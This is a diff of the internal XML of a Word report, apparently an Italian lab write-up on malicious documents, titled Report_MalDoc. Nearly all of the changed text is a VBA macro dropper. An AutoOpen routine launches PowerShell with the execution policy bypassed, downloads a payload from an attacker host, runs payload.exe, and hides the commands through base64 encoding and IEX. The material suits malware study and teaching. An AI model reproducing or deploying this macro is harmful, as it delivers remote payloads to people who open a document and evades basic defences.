+    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F74C8422-D422-4F67-B8D4-238A7F7173C7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -4875,24 +5149,6 @@
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
 <file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
   <ds:schemaRefs>

--- a/Report_MalDoc.docx
+++ b/Report_MalDoc.docx
@@ -220,132 +220,191 @@
           <w:lang w:val="it-IT"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">comandoDaEseguire2= " &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Invoke-WebRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Uri 'https://192.168.1.10:12345/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>download_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>' -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>OutFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'percorso\dove\è\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>salvato</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>\payload.zip' -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>SkipCertificateCheck</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>comandoDaEseguire2= " &amp; 'percorso\dove\è\salvato\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>.exe'"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>' Esegu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il comando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per scaricare il file malevolo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "pwsh.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:t>comandoDaEseguire</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">= "(New-Object </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Net.WebClient</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>).</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>DownloadFile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>('" &amp; "http://</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>ipattaccante</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>porta</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>/payload.exe" &amp; "', '" &amp; "</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>percorso\dove\voglio\salvare\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>zip</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>" &amp; "')"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>comandoDaEseguire2= " &amp; 'percorso\dove\è\salvato\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>.exe'"</w:t>
+        <w:t>, 0, True</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -390,7 +449,7 @@
           <w:color w:val="92D050"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> per scaricare il file malevolo</w:t>
+        <w:t xml:space="preserve"> per eseguire il file malevolo</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -408,92 +467,13 @@
       <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> "powershell.exe -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>NoProfile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ExecutionPolicy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>comandoDaEseguire</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, 0, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>' Esegu</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> il comando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> per eseguire il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>shell.Run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pwsh.exe </w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -796,6 +776,7 @@
         <w:t xml:space="preserve"> = </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="it-IT"/>
@@ -807,7 +788,14 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>("MSXML2.DOMDocument")</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>"MSXML2.DOMDocument")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1071,12 +1059,17 @@
         <w:t xml:space="preserve">Function </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>stringaABinario</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>(s As String) As Variant</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>s As String) As Variant</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1089,12 +1082,17 @@
         <w:t xml:space="preserve">    Set ado = </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>CreateObject</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>("</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1110,10 +1108,12 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>ado.Type</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> = 2 ' </w:t>
       </w:r>
@@ -1128,10 +1128,12 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>ado.Charset</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> = "us-ascii"</w:t>
       </w:r>
@@ -1141,20 +1143,24 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>ado.Open</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>ado.WriteText</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> s</w:t>
       </w:r>
@@ -1164,10 +1170,12 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>ado.Position</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> = 0</w:t>
       </w:r>
@@ -1177,10 +1185,12 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>ado.Type</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> = 1 ' </w:t>
       </w:r>
@@ -1203,20 +1213,24 @@
         <w:t xml:space="preserve"> = </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>ado.Read</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>ado.Close</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1291,7 +1305,21 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>Sub AutoOpen()</w:t>
+        <w:t xml:space="preserve">Sub </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>AutoOpen(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1392,47 +1420,105 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = EncodeBase64(" &amp; Invoke-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WebRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -Uri 'https://192.168.1.10:12345/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>download_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>' -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>OutFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 'C:\Users\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>crist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\Downloads\payload.zip' -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SkipCertificateCheck</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>codificato</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = EncodeBase64("(New-Object </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Net.WebClient</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>).</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>DownloadFile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>('" &amp; "http://192.168.43.209:8000/payload.exe" &amp; "', '" &amp; "C:\Users\</w:t>
-      </w:r>
-      <w:r>
-        <w:t>malware</w:t>
-      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>' comando per eseguire il file malevolo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t>codificato2 = EncodeBase64(" &amp; 'C:\Users\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>crist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>\Downloads\</w:t>
       </w:r>
       <w:r>
-        <w:t>payload.zip</w:t>
-      </w:r>
-      <w:r>
-        <w:t>" &amp; "')")</w:t>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>exe</w:t>
+      </w:r>
+      <w:r>
+        <w:t>")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1453,7 +1539,23 @@
           <w:color w:val="92D050"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>' comando per eseguire il file malevolo</w:t>
+        <w:t xml:space="preserve">' Comando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> codificato in base64</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1464,32 +1566,25 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
-        <w:t>codificato2 = EncodeBase64(" &amp; 'C:\Users\</w:t>
-      </w:r>
-      <w:r>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:r>
-        <w:t>\Downloads\</w:t>
-      </w:r>
-      <w:r>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.exe'")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
+        <w:t>comandoBase64 = "IEX([</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>System.Text.Encoding</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -1497,7 +1592,106 @@
           <w:color w:val="92D050"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">' Comando </w:t>
+        <w:t>' decodifico i due comandi da base64 a normali</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Replace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>comandoBase64, "BASE64_ENCODED_COMMAND", codificato)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    comandoDaEseguire2 = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Replace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>comandoBase64, "BASE64_ENCODED_COMMAND", codificato2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' Esegui il comando </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1513,7 +1707,7 @@
           <w:color w:val="92D050"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> codificato in base64</w:t>
+        <w:t xml:space="preserve"> per scaricare il file malevolo</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1523,11 +1717,47 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:r>
-        <w:t>comandoBase64 = "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pwsh.exe </w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
